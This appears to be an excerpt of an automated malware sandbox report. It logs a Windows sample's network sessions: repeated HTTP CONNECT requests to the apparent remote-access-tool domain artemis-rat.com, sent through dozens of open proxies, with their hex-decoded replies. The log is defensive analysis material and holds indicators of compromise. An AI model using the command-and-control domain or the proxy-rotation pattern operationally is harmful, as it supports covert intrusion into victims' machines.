                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1376192.168.2.454175153.19.91.77807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.632543087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.315465927 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:32 GMT
                                              Server: Apache/2.4.52 (Ubuntu)
                                              Content-Length: 612
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 73 63 40 67 63 69 2e 67 64 79 6e 69 61 2e 70 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ssc@gci.gdynia.pl to inform them of t
                                              Mar 11, 2024 08:37:32.315475941 CET268INData Raw: 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72
                                              Data Ascii: he time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443<


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1377192.168.2.45421838.162.26.10031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.638056040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.048645020 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1378192.168.2.454254162.241.46.40460977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.643119097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.163431883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.757837057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.069689989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1379192.168.2.454231194.4.50.62123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.645306110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1380192.168.2.454180121.128.194.154807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.661825895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1381192.168.2.45426338.162.6.21231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.670758009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.085623980 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1382192.168.2.45427338.162.3.7431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.673391104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.086375952 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1383192.168.2.454289129.213.150.20580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.682292938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.898482084 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1384192.168.2.454181139.224.64.19180817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.684739113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.008081913 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                              Mar 11, 2024 08:37:24.008167028 CET716INHTTP/1.1 405 Not Allowed
                                              Server: nginx/1.18.0
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 559
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.18.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1385192.168.2.454182185.110.190.99807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.685019970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1386192.168.2.45409792.255.88.21910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.696031094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069564104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1387192.168.2.45417995.66.138.2188807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.698676109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1388192.168.2.454193185.132.133.232332527284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.699918985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.996426105 CET226INHTTP/1.1 403 Forbidden
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Length: 101
                                              Content-Type: text/plain; charset=utf-8
                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                              Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1389192.168.2.4541878.217.95.4488997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.705692053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1390192.168.2.45418445.11.95.16660057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.712150097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.435033083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.569072008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645606041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1391192.168.2.454304154.205.152.9631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.712431908 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:25.927995920 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:27.013030052 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:28.292711973 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:30.916780949 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:36.036782026 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:46.277359009 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:38:08.037167072 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1392192.168.2.45419658.234.116.19781937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.763091087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1393192.168.2.454313172.64.152.98807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.763735056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.918072939 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1394192.168.2.454186180.250.159.4941537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.765651941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
